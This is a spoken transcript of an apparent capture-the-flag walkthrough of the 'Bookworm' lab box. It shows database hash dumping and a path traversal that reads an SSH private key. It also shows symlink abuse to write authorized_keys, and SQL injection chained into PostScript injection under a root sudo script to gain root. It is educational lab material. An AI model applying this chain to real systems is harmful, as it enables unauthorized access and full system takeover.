test.html, Firefox test.html. It's probably not the best way to read this error, but hey, it worked, right? We get the forbidden, you can see what that stack looks like, but I hope you guys kind of enjoyed that beyond root. I really did enjoy like this feature of Node.js. I don't know, I'm sure a lot of other languages have it, but I normally see it in this. This isn't the first time I had a file disclosure vulnerability in a Node application and couldn't do much with it just because they like locking you to directories, which is a cool thing. So let's get back to enumerating the boxes for Ink. So the very first thing I would do is check out MySQL, right? Because we had the credentials for it, and there could be passwords in this. So let's try going in. I'm going to log in with the username Bookworm to the Bookworm database, paste in the password, which was Frank the job giver. And then we're going to show tables, and we can select star from users. And let's see, we got the name and password. So I'm going to do select name. We'll do username as well and password from users. And it looks like it's just hashed, right? This is going to be password. I bet if I Google this, it'll come right up. Let's see, it is MD5. So these are all just MD5s. We could see if we could get any other user, and we'd also probably want to, let's see, hold on. Let me look at this page. First MD5. Hold on. What? Okay, it says it up here. What was I going to say? We could go hashcat route, but I don't feel like doing that. Just send it all here. I know none of these actually reverse, so it's not going to be that beneficial. Maybe we can look at what the password is at the end of the day, because the password's probably going to be in the like automation that's running, but we don't have access to automation. So we'd probably just want to save all these passwords, store them, because if they ever did crack or we got hits, it may be that user's password. Who else was on this system? If we do grep sh on Etsy, passwd, is there a James? I don't see James. We have Frank. There's no Neil. So none of the users even line up. Maybe one of these is the root password, but who knows, right? So the next thing I would look at is listening ports to see what's on this box. We have 3000 and 3001. So I'm going to see what 3000 is. It's probably going to be the website we have, right? So why wait, join now, and start your reading journey. So this is probably just what we're accessing. I would guess if we do, what is it? Etsy, is it Nginx running this? Sites enabled, default. Let's see, 3000. I was assuming it would do it like a proxy pass. Let's see. I don't actually know how this is working. CD Etsy Nginx, grep 3000-r here. It's in nginx.conf. They didn't do it in sites enabled. That is odd. But we can find on port 80, it's going to forward everything to localhost 3000. So that is the main site. Let's check out 3001. So I'm going to curl localhost 3001, and we get something different. So what I'm going to do is set up a tunnel. So to get into this SSH prompt, if the first thing you do on a line is the squiggly C, it drops you in that SSH prompt. So I'm going to do -L 3001 127.0.0.1 3001. So once I hit enter, we can go to localhost 3001 on our box, and it will forward us through that SSH session. So we have this Bookworm converter demo. We have a file to convert and output file type. I want to see if I can find this. So let's see. I'm going to find .grep convert. I don't know if this is going to be a good thing to do or not. We see a bunch of things up in home Neil. So if we go to home Neil, we can actually go in other users' home directories, which is interesting. Is there any other homes? If we go James, permission denied. So let's go to Neil. Then we have converter, and this is going to be the source code to this. So I'm going to copy this over. Let's see. Let's just open a new tab, make dir. Oh, we don't have to make dir converter. We can just copy it there. So we can do xfilled database grep pass. There we go. scp frank at bookworm.htb, and then we want to give Frank the job giver. Oh, before we do that, home, is it NEIL? Yep. Then converter to this directory, -R for a directory, paste in the password, and we probably should have zipped it. I just realized, because this is going to be a npm thing. There's probably a lot of files. Let's do find.wc-l, 2,000 files. So I'm going to stop that real quick. rm-rf converter, and let's zip it up. So we'll do zip dev shm converter. Then we'll just do stir. I think we do -R for recursive. Oh, we don't have zip. 7z? Oh, man. Oh, we can tar. Tar cjvf converter.tar. Is it bz2? Home Neil converter. Oh, we probably should have done dev shm. We probably don't have write access to this directory, and that's why it errored. Dev shm. There we go. Man, since we used zip before, my mind was just on zip, and I was like, I can't use zip, then how can I get this file? So let's scp again. We have to go cat this to grab the password because it's probably not my clipboard anymore. scp. Let's do dev shm converter.tar.bz2. Don't need the -R anymore. It is still going with that. I wonder how big this is. Maybe I shouldn't have grabbed the npm directory. I hope I don't like fill up the disk, which could have just happened, or maybe that libqt web engine core 6 thing is big. I don't know. sh frank at bookworm.htb. When doing this box, I didn't actually copy the application to my box. I just looked at it from the command line, but I really wanted to use Sneak to analyze this. So let's see, du-hs dev shm, what is it? Converter? 171 megs. Node things are so big. Golang gets a lot of flack, but man, Node. I'm just going to pause the video, let this finish. It'll be a few seconds. Okay, the file has finished. So I'm going to make dir source. We'll go in there, then tar xjvf converter .tar bz2. And is going to extract this. And then once it's done extracting, we will be able to open this up with Sneak and see what it says. or open up with Visual Studio Code, which then will use Sneak to tell me if there's vulnerabilities. I'm kind of curious if it detects this, right? So let's do code dot. And Visual Studio Code should be opening. There it is. Update later. Go over to Sneak, which is going to scan the application. So open source security found a few things. Cross-site scripting, arbitrary file upload. These are CVEs in this, which I don't think is relevant to us. But we have, whoa, man, quite a few vulnerabilities. Cross-site scripting, a path traversal. I think this is what we want. Unsanitized input from upload file flows in. I want to say this is what we want. Not positive. Let's see. Server.js. We make a post to upload. That may be it. What is index? Okay, this is looking more what I expected. So we have a path traversal vulnerability in here. So it looks like it does find it. A regular expression denial of service is also there. We could crash the web service if we wanted to. So there is somewhat of a path traversal. Let's see, HTTP body 33. So we're just grabbing request.body and output type. And down the line, we will spawn convert ebook on the file path and destination path. Let's just try this application out and see what it does. Starting with the code without seeing what it does is somewhat tough to explain. At least JavaScript, where I'm not that great with to begin with. So let's go to HTTP, Bookworm, and I'm going to put a text file. So let's do test.jpg. This was just please subscribe, right? Yeah. Let's move this to test.txt. So we want to be able to write this file, because if we can write this file, then we may be able to do something. Like a lot of exploits go with file writes, or maybe we can read files. I don't know. So let's do all files, test.txt, output type. We can do EPUB, docx, Amazon Kindle, or PDF. So if I do the EPUB format, let's see. Let's make sure we intercept. So we have please subscribe EPUB, and this is output type. And we know there was a path traversal vulnerability here. So I'm just going to try like dev shm EPUB. Whoops, I have caps lock on. There we go. Let's forward this request. And then on this box, I want to look at dev shm to see if we wrote a file. We have converter tar bz2, but we did not write the file. So let's go back to history, put this in repeater, and we will put a bunch of ... slashes. Save this, cannot post. Did we go too high? Let's see, ... slash. Do 3, not found. Oh, it's writing. So we got a 404, but it does write. Okay. So we do lsla. There's no a small file. I'm going to grep for please on these files. And we do get index.html. So I'm assuming this application is running as Neil because it's in his directory. Not positive by that, but that is my guess. And if I could get a line break in here, we could write a SSH key and potentially write to authorized keys. So let's try a BR since this is HTML. I wonder if we're going to have to change the file name. No, we don't. It overwrote. So it did not work. We have any encoding. What if we put a bunch of breaks? Send that. It puts them on separate lines. So that is not helping us. It is using, let's see, convert ebook. Let's look at this function. It is using Calibri, which is a binary. I bet we had it on our box. We probably could look at it here. Calibri, bin. So it's using this binary to write the ebook. So let's Google. Actually, before we Google, I just had an idea. What if we gave it HTML? So if we said, let's see, can we do HTML injection? So it would be image source is equal to file etc passwd. I think that's all we need. Send this. Do a less. And that did not look like it worked. Wonder if we gave it the HTML MIME type real quick. Let's try this real quick. Move test.text to test.html. Let's copy this. And then we will just go upload it again. Let's do upload all files, test HTML. Are we still intercepting? We are. Convert. Send to the repeater tab. And I'm going to grab this. It's text HTML now. I wasn't 100% sure on the MIME type, right? So we sent that. Now let's do a less. And it still did not include it. So I'm thinking maybe we can't include this. Thought there was a way to do it, but maybe not. Let's just look in the EPUB file again. Oh, wait. 417. Image source passwd. That was new. Let's see. Grep Frank out of all this. Not there. Let's do EPUB2. CD EPUB2. So I think it's supposed to be in this file. We get image source.passwd. We included that. So I'm going to try one last thing. Node.js really does love having root directory set, which you can't go out of. So if we do home Neil, let's see. What is dev? Did we see dev? Oh, that was us writing. Let's try .profile. We'll do home Neil .profile. So we can say home Neil .profile. Okay. CD dev shm, CD EPUB2, whoops, EPUB, I meant 2. Oh, .passwd. It did write it. It just, for some reason, makes everything hidden. I guess I should have known that from this 29F, that image source was .passwd. It's weird that it did that. But we have a ._profile as well, which is that. So we could try getting the SSH key. So we could do like .ssh ID RSA like that. We do lsla. Let's just go out of his directory epub2. We don't have a SSH key, which probably means it doesn't exist. There is one possibility also. If we do this, we see these people like using whatever that key is. So we can try this. I'm also going to add a .pub to it to see if he has a public key there. If we look at epub2, we can cat or cd epub2 cat.id ed. Oh, we do have a key, and we have a public key as well. So we should be able to try this. So chmod 600.id. Let's just copy this to a box. So v, this is neil.key, paste, chmod 600, sh-i, neil.key, neil at, we did bookworm.htb, and we get a password. So just because the private key is there doesn't mean it's in the authorized keys file. We can try exfilling that as well. And let's see. I don't see it. So I'm guessing that means it's not here. Right? We tried to include it, but there's no files that would have it. So authorized key doesn't exist. So we have to go in FileWrite probably, so we can write that authorized key file. So let's see. If we went back to the source, we can go Calibri ebook convert. Let's Google this. Google. My intercept is on. Okay, Calibri ebook convert. I'm going to do extensions, or let's just search this. So this piece is really useful to know, right? So Calibri supports multiple formats, and if we have a extension, it'll use that. If there is no extension, it uses the open ebook format, which is HTML files. So when we're writing this, where's a burp? We're not giving it a extension, so that's why it's doing that one format. So I bet if we did dev shm, let's just call it out.txt, and we say, please subscribe. We save this. Now let's go in dev shm. There's out.text. That is just please subscribe. So that works. Now the issue is authorized keys doesn't have an extension. So if we try to write it, then it's going to write as that open ebook format, right? However, we can abuse SymLinks. So we could create a symlink to home Neil SSH authorized keys. And we're going to say, we're going to call it pwned.txt, right? So if I look at pwned.txt inside of dev shm, it's pointed at this file. And since we can't read that file right away, let's do something different. We can say dev shm. We'll call this please sub. And we'll call it ipsec.txt. Okay. So this one we'll be able to more easily read. So we don't have a please sub file. If I try to cat ipsec.txt, it's going to go no file, right? So if I change this to be ipsec.txt, we write it, we do it ls. I Thought we'd have a please subfile. We did that. I wonder if we have to make a directory that's readable and writable by everyone. Make dir test chmod 777 test. Let's see. Let's go back to ln. Let's write to test please sub. So that is empty. Ipsec.text exists here. So when we write to it, please work. It did not. I was hoping we'd have a file called pleasesub.txt owned by Frank or Neil, but we don't, which is odd. Let's see. What is going on? If I don't make that symbolic, can we still do it? No file if it's not symbolic. Okay. Let's try putting the symlink inside of our test directory as well. So we can now do a ln-s. What do we call the symlink? Was it ipsec.text? Yep. So we'll call it pwned and ipsec.text. Okay, so if we write to ipsec.text, it'll go to pwned. So let's now put this in our test directory, which was test. Run it again. And we get it saying, please subscribe. And we have the file here. So what happened? This is a, let's see, if we do protected SymLinks, the behavior, I think it's from Linux, right? So if we look at SymLinks, there is a odd behavior. So when set to 1, SymLinks are permitted to be followed only when the outside of a sticky world writable directory or when the UID of a symlink and follower match. So what was happening before is, I don't think dev shm, is that world writable? Let's grep shm. Maybe it is. Maybe this is a weird directory, because that is 777. But it was protected, right? When I made this test directory, then that's what enabled it. I wonder if temp is the same way. This is just a weird directory. If you have trouble with symlinks, make sure they're in a directory that's chmoded 777 and not in dev shm, or like the symlink or follower match, right? I wonder. Yeah, we don't have any permission over, like, are we in groups? Do we have same group? No. I was wondering if maybe a group ID was the same, putting in the test directory did that, but no. So we want to have it in the test directory. And let's see. I want to try something real quick. Let's delete both of these files. Oh, we can't delete pwned. Okay. So let's do that ln again. So we're going to create home Neil, please subscribe. So when we write to ipsec.text now, it should go into Neil's directory. It does. So if I was not in the sticky directory, or the word writable directory, let's see what happens. Let's remove ipsec.text, ln-s. We'll do please subscribe to. Around that. There we go. So remove this. Right. lsla home Neil. Please subscribe to did not work. If we did this in, well, temp's a bad directory because we have all these systemd privates. We never know if I guess we could kind of guess. Login D, resolve, time sync, up power. So I don't think the web service or npm service is running in a private directory because I don't see anything labeled it. So let's try this real quick. Let's do ln home Neil and temp. Would it work in temp? So let's do ls, la, Neil. Does not work. So let's go in Neil's directory. Can we write files as Frank? We can't. So I think we're pretty much stuck having to use this dev shm test directory that we chmod to 777. There may be another way, but that's just the things I do when I'm solving boxes to kind of test my knowledge, right? So let's remove ipsec.txt. Let's now point it to .ssh authorized keys. So now when we write to ipsec.txt, it goes to this authorized key file. So let's see. What key do we want to put? Well, we can go to epub2, cat id.pub. Let's just put this key because we already saved it to our box. So we're going to write this key here, and we do dev shm test, and we try to SSH with the key before we sent it. It does not work. Send this, and we get in. So we save that key from his SSH directory. If we didn't have his key there, we could also generate our own SSH key and use that. I just used it because we could, right? So now we are both Neil and Frank in Bookworm. So if we go in dev, oh, that's our directory that we accidentally wrote to. Okay. If we do a sudo -l, we can see we can execute this GenLabel binary as root. So we should poke at this binary. If I try to do sudo GenLabel, let's see what happens. It wants an order ID, so we'll do 11. And it's made a PDF in temp, whatever this is. So output dot, it's got a PostScript file, and then it's also got a PDF. So I bet if we copied this, so scp-i neil.key, neil at bookworm.htb / this directory. Let's open output.pdf, and it's going to print this. Awesome. So we want to see exactly what GenLabel is now. And the easiest way to do that is just run a file command against it, right? So we want to see what type of file this is. And it looks like it is a Python script. So if we open this up in Vim, we can see what it does. So it's going to connect to the database. Then we have a query, and then we execute. So there's SQL injection right here, right? Because we're just passing our query straight into the MySQL. The issue is it doesn't really buy us anything because we could just go into the MySQL database of this user anyways and do load file. So that piece isn't that interesting. Even though we have SQL injection, it's not giving us any additional privilege right now. So then we're going to create this PostScript file, output.ps, create the PDF location. Oh, this is just defining where we write to. And then we're going to open it. We're going to read it. We're going to write the data. And then we're going to generate a PDF with this PS2 PDF. The paper size is just going to make like the PDF to be the A4 paper size. D no safer. Let's see, PS2 PDF. This means we can like write or delete files. Like it's disabling all the safety things in the PDF generator. Let's see, do we have it? No safer. It disables the safety mode. So we have access to read, write, delete files, etc. So this piece is interesting. So we got like a double injection going on, right? So we have this MySQL injection, and it's feeding data to this PostScript file, which then gets ran with the converter as root. So if we do some PostScript injection, it'll run as root, and we can write arbitrary things through SQL, right? So let's look at the output. So it's cd temp. Is it gone already? Yeah. Sudo GenLabel 13. Let's go to this directory. Let's cat output.ps and see what type of data we have. Let's see. What is the first field actually? Did I open that in less or Vim? I did Vim. Let's do that again. So what is the first field we write probably? Address line 1. So let's look at that. I don't know what address line 1 is, but we can open 62 West Lane. So if I search for 62, there we go. So we're writing right here, and we can control whatever we want here. So we could put a PostScript operation to write a file, for instance, right? So I'm going to, let's see, Google PostScript write file. I'm going to search Hacktricks first to see if they have anything. File system access. This is not PostScript, right? Looks like maybe. Okay, so it looks like we have something here. We do, I think percent is comments. So this is listing files, reading files, writing files. So let's just try writing a file. So what we're going to want to do is close that parenthesis. Then we can, let's see. We will want to close the parenthesis, Vim payload. So we want to definitely close it. Then we want to say /out. I wonder if, can we do line breaks like this? Let's see. Let's try this. Let's do /out file. We'll do dev shm pwned.txt. We'll do pwned root.txt, I guess. I'm not sure if pwned.txt already exists, right? W plus. So that's probably append. So file def. Why do we do two? I wonder if these two brackets are bad. Let's try this. Out file. Hello world. Write string like that. Then we just do out file, close file. Then I'm going to leave a open parenthesis because that's where this is going to come in, because it's going to append that close parenthesis and show. So I think that's what I want. So we can probably test this. So let's do that sudo again, generate a label. I'm going to go in that temp directory. I'm going to copy output.ps to be in dev shm. And then let's go here, ps2 pdf. Let's see, PostScript output, PDF output. So we should be able just to write this. So right now I'm not being root, so it should be fine because I'm just doing everything in a word writable directory, right? So let's do output.ps and we'll call it output.pdf. ls la output.pdf. It created it. So I think we are good there. So let's try our injection. So let's do output ps, and what was that street? Let's see. Do I still have the PDF open? 62 West Lane. Okay. 62 West Lane. So we want to test this injection. So I'm going to cat the payload. We're going to pretend we have the union already. And we're just going to paste our payload in. So we closed that. We put the out file and we write hello world. Pwned test. So now if I run this again, we do have a pwned test. That is good. And it's just the string we wanted. So that is very, very promising. So what we want to do now is vpayload. We want to write the SSH key here. So let's grab the SSH key we had used before, just because it's easy. We could also like write to the cron file or do a bunch of other things, right? Doesn't have to be an SSH key. Whoops. We want to write there. And we want to write to /root/.sh authorized keys. Okay. So we should be writing there. And let's do a base64 encode. Okay. So now we want to do the union injection. Let's see. We do a vim. How many lines or entries do we have? So there's 1, 2, 3, 4, 5, 6, 7. We have 7 entries we have to inject. So let's do, whoops. Sudo like this. And then, oh man. Was it a double quote or single quote? Order ID is equal to, oh, there are no quotes. I know the whole string is quoted, but there's no quote here. Like I was kind of half expecting it to be order ID and then quoted like that, but it is not quoted. That makes life easy. So sudo, let's just say this order ID hopefully doesn't exist. Union select 1, 2, 3, 4, 5, 6, 7, like that. And let's go in temp, tm, whatever. We should grab this file actually. scp output.pdf. And I'm expecting this to be pretty much a blank PDF, or at least where all the entries are, right? So we have 1, 2, 3, 4, 5, 7. So we have confirmed the SQL injection, right? So now we want to inject our payload here. So we can say select from base64. and then put in our payload, right? And I think this is going to work. The question is, does it work first try? So let's look at this temp file real quick. Temp4, then output ps. We wrote out file somewhere. So you can see what it is. This is where the address line would be. And then we do /out file, the SSH key. We wrote the string, closed it, and then we keep the PostScript valid by putting that open parenthesis. So it looks like we wrote the key. So all that's left to do is attempt to SSH with Neil's key to root at bookworm.htb. And moment of truth, we are root. So that is going to be the box. Hope you guys enjoyed it. Take care, and I'll see you all next time.